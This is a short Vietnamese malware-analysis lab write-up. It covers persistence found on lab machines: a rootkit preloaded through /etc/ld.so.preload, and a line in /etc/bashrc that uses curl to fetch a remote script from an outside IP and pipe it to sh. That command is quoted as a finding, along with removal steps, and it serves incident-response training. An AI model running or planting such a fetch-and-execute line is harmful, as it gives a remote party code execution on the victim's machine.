Finding Threat (Lab 21 - 24)
Malware Analysis
Last updated
Malware Analysis
Last updated
Khi vừa mới mở máy lên, mình đã thấy có một thông báo lỗi như này:
Thư viện libxselinux.so đã bị từ chối load vào trong LD_PRELOAD. Đây là một trong số các kĩ thuật hooking mà mình đã được học qua. Có vẻ đây chính là malware. Mình sẽ down về và kiểm tra coi sao
Tuy nhiên mình cứ mở lên hay làm gì là Kapersky ở công ty chặn bay màu :v Mình sẽ thử lấy md5 của file này và up lên VirusTotal xem sao. Nếu nó là một mã độc cũ thì khả năng sẽ có thể detect ra được
Đưa mã hash vào VirusTotal và đúng như mình nghĩ, ta có được 1 con rootkit.
File mã độc:
/lib64/libxselinux.so.Mã độc được đưa vào
/etc/ld.so.preloadđể được ưu tiên load trước.Cách gỡ mã độc:
sudo rm -rf /lib64/libxselinux.so
Lab lỗi không revert snapshot được
Mình đã thử rà soát một hồi nhưng chưa thấy con mal nào cả :<
Chưa tìm ra malware
Với lab này, khi mới kết nối qua SSH, mình thấy có một thông báo như sau:
Thử check .bashrc, tuy nhiên có vẻ là không có gì trong này
Vậy thì mình sẽ thử check tới file etc/bashrc coi sao
Mình thấy có một đoạn lệnh curl sử dụng để down file Ci.sh về và khởi chạy sử dụng lệnh sh. Có thể đây chính là mã độc. Thử check url trên, mình thấy file này đã không còn tồn tại, giải thích cho các output mình thấy ban đầu
Mã độc nằm trong file:
/etc/bashrcĐoạn mã được sử dụng:
curl -s -L http://217.12.221.12/Ci.sh|shCách gỡ mã độc: xóa dòng trên khỏi file
/etc/bashrc
Lab lỗi không revert snapshot được
Lab này mình cũng rà soát một hồi nhưng chưa thấy con mal nào hết
Chưa tìm thấy malware
© 2024,Pham Quoc Trung. All rights reserved.
